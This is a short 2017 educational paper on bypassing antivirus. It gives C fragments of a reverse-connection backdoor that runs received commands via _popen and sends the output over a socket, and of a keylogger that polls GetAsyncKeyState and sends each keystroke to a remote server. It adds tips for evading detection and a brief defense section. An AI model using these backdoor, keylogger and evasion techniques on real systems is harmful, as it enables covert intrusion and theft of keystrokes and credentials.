Bypass an antivirus: too simple
Trivial Techniques for Evading and Solutions to
Defend
Author: Stefano Gorresio
Date: 04 May 2017
1
Index
1)Premise................................................................................................................3
2)Testing Environment............................................................................................4
3)Introduction.........................................................................................................5
4)There are more ways to solve the same problem................................................5
5)Examples..............................................................................................................8
a)Executable Backdoor........................................................................................8
b)Remote Keylogger..........................................................................................11
c)Script Malware...............................................................................................13
6)Conclusion..........................................................................................................15
a)Techniques for evade AV................................................................................15
b)Techniques for defense...................................................................................15
7)Note....................................................................................................................17
2
1) Premise
This document is not exhaustive; it is intended to only show how an antivirus can
not be effective in a lot of situations.
This topic is described in a very superficial way.
This is not a complete guide that illustrates AV evasion techniques, but only a
cognitive document.
This document is a report of many tests made by me over the years.
Everything that is written in this document has been tested several times.
Any tests done, will be illustrated in order to be playable by anyone.
This simple analysis does not claim to not use antivirus... in fact, the antivirus
must be used, but should not be considered a complete and exhaustive defense
system.
The content that will be expose in this paper is not anything new, but by analysis
made and how people and companies have "strange ideas" about computer
security, it seemed right publish some considerations.
These malware will also be simple and obvious, but as tested, they are revealed
fully functional in some penetration test.
The full source code of these malware are not public for now.
This document was written for cognitive and didactic reasons.
I apologize if my english is bad. XD
3
2) Testing Environment
All target are computer with Microsoft Windows (Windows 10 and Windows Server
2016) and all attacker are computer with GNU/Linux (Arch Linux and Kali Linux).
The malware are tested on VirusTotal service and directly on Windows Defender,
Avira and McAfee (trial version). Other test are done occasionally on Sophos.
The malware are programmed for Windows in C (compiled with gcc) and in
Assembly x86, x86_64 (compiled with FASM) and the server/client C&C are
programmed in Python 2.7 (working also on Windows).
These analyzes were performed in a distributed and not continuous way from
2012 (the year when I became interested in malware) to date.
Below is the list of malware programmed (or downloaded) and used for testing:
•
•
•
•
BackDoor17: Reverse connection backdoor programmed in C for Microsoft
Windows. Execute cmd and powershell commands to remote.
RemoteKeylogger: Bind connection keylogger programmed in Assembly
x86 (32 bit exe) for Microsoft Windows. Send key pressed to remote host.
RemoteKeylogger17: Reverse connection keylogger programmed in C for
Microsoft Windows. Send key pressed to remote server.
Porting of a keylogger programmed in 2014 (RemoteKeylogger).
Metasploit Payloads: Payloads (ex. reverse shell) included in the
Metasploit Framework.
Some of these programs have been programmed for tests and are not fully
adequate for a penetration test (although they can be used without problems).
4
3) Introduction
Many people and companies are convinced that the security IT can only be
managed with the use of a good antivirus.
Furthermore, there is a common belief that a malware that can evade AV must be
a complex, advanced software, polymorphic, smart, etc.
Wrong…
The best way to bypass an antivirus is the simplicity and banality in programming.
Usually, the malware are stupid programs that do simple things like run
commands, connect remotely, replicate, and so on.
If a malware acts like a regular program, the AV does not deem malicious.
4) There are more ways to solve the same
problem
Make an example...
Most of the reverse shell that can be found on the internet, are easily detected by
AV.
But if we want to use a reverse shell on a server with Windows Server
(unfortunately the most used operating system for servers in Italy) with an
antivirus which performs its job well with backdoor, what can we do?
The first question to ask is: what I want exactly?
A reverse shell (in any form) is usually used to execute shell commands remotely
and see the output of the commands sent.
The problem may so change from "how do I run a reverse shell?" to "how do I
execute commands remotely and see the output?".
The problem is the same, but honestly I find more convenient to ask the question
in another way.
5
Instead of using a reverse shell already programmed, we try to program it in C.
Many reverse shell for Microsoft Windows work like this:
1. Initialize and create socket
2. Connect to server C&C (host attacker or specifically dedicated server)
3. Execute CreateProcess function with cmd.exe and with redirected stdin,
stdout and stderr on socket
The third point is that which could give serious problems.
Create a connection to a host is not malicious, but run cmd.exe redirecting "the
flow" on the socket just created is quite suspect.
Note: the antivirus does not tend to analyze only a single part of a code, but they
tend to analyze everything.
An antivirus can consider a call to an API suspected or harmless, also on the basis,
for example, to calls or to operations carried out previously.
To achieve our goal, is it mandatory to use CreateProcess, launch cmd.exe and
attach the socket?
Thankfully (or misfortune) no.
We can trivially try making the following reasoning:
What should do our program?
It must connect to a remote host, receive commands (receiving data), execute
shell commands locally and send the output (send data).
What can we already do without any problems?
We can connect to a remote host and send and receive data.
What are we missing?
Running shell commands locally.
The problem then becomes "how do I execute shell commands locally and
save the output in a buffer (for subsequent transfer)?".
6
The answer is found in _popen function.1
FILE *pipe = _popen(char *command, “rt”);
pipe = output (data that will be sent)
command = input (received data)
Now we just have to connect everything.
uint8_t esegui(FILE *pipe, char *data, SOCKET s){
char *data_pt = data;
if((pipe=_popen(data, "rt")) == NULL)
return 1;
while(fgets(data_pt, MAX_SIZE, pipe))
if(send(s, data, strlen(data), 0) < 0)
return 1;
// Execute Command
// Send Output
_pclose(pipe);
return 0;
}
For each command received, are sent multiple outputs (one line at a time is sent).
This code works, but it is not optimized.2
But for us this is enough.
… Our backdoor programmed in C works and the antivirus is not a problem.
The reasoning and the work done are stupid, but very effective.
It's true! We have realized a simple backdoor… but the procedure for
programming a complex persistent backdoor, with encrypted connection, able to
handle all the exceptions and be "robust at all", does not change.
I confirm what many people say ... The best solution is the simplest and
banal.
7
5) Examples
a)
Executable Backdoor
A backdoor is a program that allows access to a system ignoring any
authentications, etc.
They are usually programs that allow the execution of shell commands remotely,
often managing the remote connection (a webshell does not handle the
connection).
A good backdoor must be undetectable (by AV and humans), should be able to
handle all exceptions (especially on sockets), communication between the target
and the attacker must be cryptographically secure (carrying confidential data
across the Internet in clear during a penetration test is not very nice) and must be
persistent (for long-term access).
I personally prefer "reverse" connections (from target to attackers) simply
because they are the least annoying to manage, and I noticed that they tend to
be less detectable.
BackDoor17 is a reverse connection backdoor programmed in C that allows the
execution of arbitrary commands on Microsoft Windows.
The program netcat is sufficient and great for controlling the backdoor.
The connection is not encrypted.
This backdoor is not projected for long-term access.
When this backdoor is performed, tries to connect to a TCP socket specified in the
programming phase.
At each connection closing (or any connection problem), the program will lock for
a number of seconds (I have set to 30 seconds) before trying to reconnect.
The following are the commands that you can perform:
<command>
powershell <command>
exit
kill
Windows cmd.exe commands
Powershell commands
Close connection (retry after 30 seconds)
Kill backdoor (terminate process)
8
To handle the connection are being used API Winsock2.
To execute shell commands is used _popen function.
Create a connection to a host is not malevolent action.
Perform _popen function is not malevolent action.
The whole is not detected malicious.
This backdoor is very useful as a "backdoor first access".
By running this backdoor on Windows Server with sufficient permission you can
easily disable the local security systems (antivirus, agent, etc.) and then load a
backdoor most powerful and detectable (ex. Meterpreter).
9
Note: The > character is optional and indicates when typing the command.
10
b)
Remote Keylogger
A keylogger is a program that intercepts keystrokes and stores them in a file or
send them to a remote server.
In my research, I programmed and analyzed two keylogger with the same
"capture" operation, but programmed differently and with different connection
management.
RemoteKeylogger is a bind connection keylogger and it has been programmed in
Assembly x86 (32 bit). It, on virustotal, was detected from 6/59 AV.
I programmed it in 2014.
RemoteKeylogger17 is a reverse connection keylogger and it has been
programmed in C (64 bit). It, on virustotal, was detected from 1/61 AV.
In both keylogger, the algorithm of "capture keys" is the same, but change the
machine instructions, the architecture and the type of connection.
The call to the API is the same in both.
netcat is a great client/server.
The code of the socket management is identical for RemoteKeylogger17 and for
BackDoor17.
Once that happens a data transmission fault, RemoteKeylogger17 wait a defined
time (30 seconds) before try again to connect to the server.
To capture keystrokes, the GetAsyncKeyState function has been used to check if
a specific key has been pressed at that instant.
Every 80 milliseconds is performed a scan on some keys of interest (letters,
numbers, shift, space, enter, etc.) and if at that time, a button has been pressed,
it sent to remote server the key encoded in ASCII.
This is the classic behavior of many of the keylogger on Windows.3
11
Below, a part of the RemoteKeylogger17 code that checks the keys with the
virtual-key code from 48 (0x30) to 90 (0x5A).
for(i=0x30; i<0x5B; i++)
if(GetAsyncKeyState(i)){
// Check if the button is pressed
str_pt[0] = i;
if(send(s, str_pt, 1, 0) < 0)
return;
}
The entire code must be obviously improved.
i is a uint8_t
str_pt is a *char
s is a SOCKET
12
Note: Since as can be seen in the figure above, it should be properly adjust the timeout after the
detection of a pressed key (single sleep of 80 ms). The ^ character indicates the Shift pressure.
c)
Script Malware
Many malware are simple scripts (ex. webshell, VBS, bash, etc.).
The malware scripts are usually less detectable than the others.
Let's take an example.
At the same payload (ex. windows/x64/meterpreter/reverse_https of Metasploit
Framework), a VBS is less detectable that an executable exe.
13
The webshell are less detectable.
Note: It’s true, an aspx code is not really a script (it is compiled), but from a "malware" point of
view it looks more like a script than an executable (what it actually is): from an attacker's point of
view it is treated as a script (load source code not executable code) and antivirus seems to see it
as a script (the detection probabilities are almost identical to those of a script).
14
6) Conclusion
a)
Techniques for evade AV
In a penetration test, personally, I always prefer to use the script backdoor.
On Windows, as the first access backdoor, I recommend using powershell script
(less detectable of the VBS script).
On UNIX-like systems, such as first access backdoor, I recommend the use of sh
script (I do not recommend immediate use of bash and python, are not always
present).
As webshell, I recommend the use of controllable script directly from browser (I do
not recommend the use of reverse shell, more detectable and more problems on
any firewall).
If a code is detected by an antivirus, the simplest technique to evade an AV is
trying to change the instructions, the order of them, or the parameters passed to
the API.
The antivirus analyze the instructions and calls to the API, not the algorithm.
b)
Techniques for defense
To defend against malware, the antivirus use is not enough.
In computer security, it is important one thing that many people and many
companies do not have: the good sense.
It is useless to have antivirus, IDS, "enterprise support" to exaggerated cost, when
you leave the credentials (ex. pfsense, server admin, etc.) to the default values or
easily detectable (the most stupid and widespread security hole).
The common replicating malware do not replicate through buffer overflows, 0 day,
or through complicated methods; simply replicate through shared media, specific
mechanisms using default credentials or other simple mechanisms left open
(almost always for laziness and not by necessity).
15
I am convinced that a network must be minimal: it must be modular with the bare
minimum.
It is useless to have a heavy operating system, with thousands of processes for a
variety of things, when at last you use it only as a file server or web server.
The most common result is to have unstable servers, underperforming that
require monstrous hardware to do things that would require also only a Raspberry
PI (I exaggerate, but the reality is not much different).
These problems, of course, increase information security risks: too many
minimally monitored unnecessary services and especially too much freedom of
movement, increase the probability that malware can operate without problems
(as well as to allow more facilitated cyber attacks).
… All that I have written is obvious, but for many companies and people do not
seem be to all.
In conclusion... the antivirus is important (sometimes plays an important role on
computer security), but if you want to use IT infrastructure also for critical
activities, make sure you know well all that you do (for example how work the
software that you are using), and above all take great care in computer security
(cyber security also deals with the robustness of information, not only with its
confidentiality).
16
7) Note
This paper should be used only for educational purposes, analysis and any purpose that goes not to violate
any applicable law.
Some screenshots were taken on systems set on the italian language and some imges will have text in italian.
1
On internet there are many backdoor’s codes with this functioning.
2
This code was taken from BackDoor17.
3
On internet, you can find many similar codes.
17